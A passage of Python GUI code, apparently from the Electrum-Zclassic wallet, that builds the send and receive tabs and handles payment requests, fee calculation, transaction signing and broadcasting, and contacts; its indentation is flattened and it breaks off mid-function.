self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Zclassic addresses.'),
_('The Zclassic address never expires and will always be part of this electrum-zclassic wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
URI = util.create_URI(addr, amount, message)
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
URI += "&name=" + req['name'] + "&sig="+sig
return str(URI)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req, self.config)
except Exception as e:
traceback.print_exc(file=sys.stderr)
self.show_error(_('Error adding payment request') + ':\n' + str(e))
else:
self.sign_payment_request(addr)
self.save_request_button.setEnabled(False)
finally:
self.request_list.update()
self.address_list.update()
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
addr = self.wallet.get_receiving_address() or ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_URI(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.set_content(addr, amount, message, uri)
def set_feerounding_text(self, num_satoshis_added):
self.feerounding_text = (_('Additional {} satoshis are going to be added.')
.format(num_satoshis_added))
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Zclassic address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Zclassic address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = MyTreeWidget(self, self.from_list_menu, ['',''])
self.from_list.setHeaderHidden(True)
self.from_list.setMaximumHeight(80)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(140)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('Zclassic transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
self.feerate_e.setAmount(fee_rate)
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.is_max else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(140)
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if not edit_changed.get_amount():
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(140)
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_kb())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, Electrum-Zclassic tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.'))
QMessageBox.information(self, 'Fee rounding', text)
self.feerounding_icon = QPushButton(QIcon(':icons/info.png'), '')
self.feerounding_icon.setFixedWidth(30)
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
vbox_feecontrol = QVBoxLayout()
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
if not self.config.get('show_fee', True):
self.fee_adv_controls.setVisible(False)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(t):
self.is_max = False
self.max_button.setEnabled(not bool(t))
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _( "Not enough funds" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
self.is_max = True
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.is_max else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
else:
fee_estimator = self.get_send_fee_estimator()
outputs = self.payto_e.get_outputs(self.is_max)
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
self.get_coins(), outputs, self.config,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
traceback.print_exc(file=sys.stderr)
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
if displayed_feerate:
displayed_feerate = displayed_feerate
else:
# fallback to actual fee
displayed_feerate = fee // size if fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
displayed_fee = round(displayed_feerate * size / 1000) if displayed_feerate is not None else None
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = round(displayed_fee * 1000 / size) if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
self.set_feerounding_text(feerounding)
self.feerounding_icon.setToolTip(self.feerounding_text)
self.feerounding_icon.setVisible(bool(feerounding))
if self.is_max:
amount = tx.output_value()
self.amount_e.setAmount(amount)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount()
amount = 0 if amount is None else amount
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
def read_send_tab(self):
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs(self.is_max)
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
if not outputs:
self.show_error(_('No outputs'))
return
for _type, addr, amount in outputs:
if addr is None:
self.show_error(_('Zclassic Address is None'))
return
if _type == TYPE_ADDRESS and not bitcoin.is_address(addr):
self.show_error(_('Invalid Zclassic Address'))
return
if amount is None:
self.show_error(_('Invalid Amount'))
return
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
r = self.read_send_tab()
if not r:
return
outputs, fee_estimator, tx_desc, coins = r
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except NotEnoughFunds:
self.show_message(_("Insufficient funds"))
return
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
amount = tx.output_value() if self.is_max else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > confirm_rate * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_signed(result):
callback(True)
def on_failed(exc_info):
self.on_error(exc_info)
callback(False)
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
# call hook to see if plugin needs gui interaction
run_hook('sign_tx', self, tx)
task = partial(self.wallet.sign_transaction, tx, password)
WaitingDialog(self, _('Signing transaction...'), task,
on_signed, on_failed)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status, msg = self.network.broadcast(tx)
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_addresses()[0]
ack_status, ack_msg = pr.send_ack(str(tx), refund_address)
if ack_status:
msg = ack_msg
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.amount_e, self.message_e]:
e.setFrozen(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.show_message(self.payment_request.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except BaseException as e:
self.show_error(_('Invalid zclassic URI:') + '\n' + str(e))
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.is_max = False
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_kb())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
l.setObjectName("addresses_container")
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_addresses', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove")+" %s "%addr +_("from your wallet?")):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
if pr is None:
self.show_error('Cannot find payment request in wallet.')
return
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
fn = self.getSaveFileName(_("Save invoice to file"), "*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
